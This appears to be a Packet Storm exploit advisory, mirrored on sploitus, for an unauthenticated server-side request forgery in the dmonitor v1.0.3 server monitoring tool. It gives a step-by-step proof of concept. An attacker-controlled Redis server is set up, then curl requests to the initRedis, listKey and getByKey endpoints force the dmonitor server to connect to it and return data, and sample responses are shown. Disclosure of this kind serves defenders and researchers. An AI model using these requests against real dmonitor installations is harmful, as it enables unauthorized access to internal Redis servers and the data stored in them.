## https://sploitus.com/exploit?id=PACKETSTORM:219268
# Exploit Title: dmonitor v1.0.3 - Unauthenticated SSRF
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dmonitor
# Software Link:
https://github.com/dhjz/dmonitor/releases/download/1.0.3/dmonitor.exe
# Version: 1.0.3
# Tested on: Windows 10, Linux
# Description:
dmonitor v1.0.3 is a server monitoring tool with a Redis client feature.
The /monitor-api/redis/initRedis endpoint allows unauthenticated users to
specify arbitrary Redis connection parameters (host, port, password). This
enables an attacker to force the dmonitor server to connect to an external
attacker-controlled Redis server / internal Redis server and exfiltrate
data through the listKey
and getByKey endpoints.
# Proof of Concept:
1. Attacker sets up a Redis server on their machine (192.168.1.104):
redis-server --port 6379
redis-cli set test_key "SSRF_CONFIRMED"
2. Force dmonitor to connect to attacker's Redis:
curl "
http://192.168.1.102:40001/monitor-api/redis/initRedis?host=192.168.1.104&port=6379&password=
"
Response: {"code":200,"msg":"ๆไฝๆๅ","data":{"currDb":0,"redisInfo":{...}}}
3. Enumerate keys from attacker's Redis via dmonitor:
curl -s "http://192.168.1.102:40001/monitor-api/redis/listKey?keyword="
Response: {"code":200,"msg":"ๆไฝๆๅ","data":["test_key"]}
4. Exfiltrate the value:
curl -s "
http://192.168.1.102:40001/monitor-api/redis/getByKey?key=test_key"
Response:
{"code":200,"msg":"ๆไฝๆๅ","data":{"key":"test_key","value":"SSRF_CONFIRMED"}}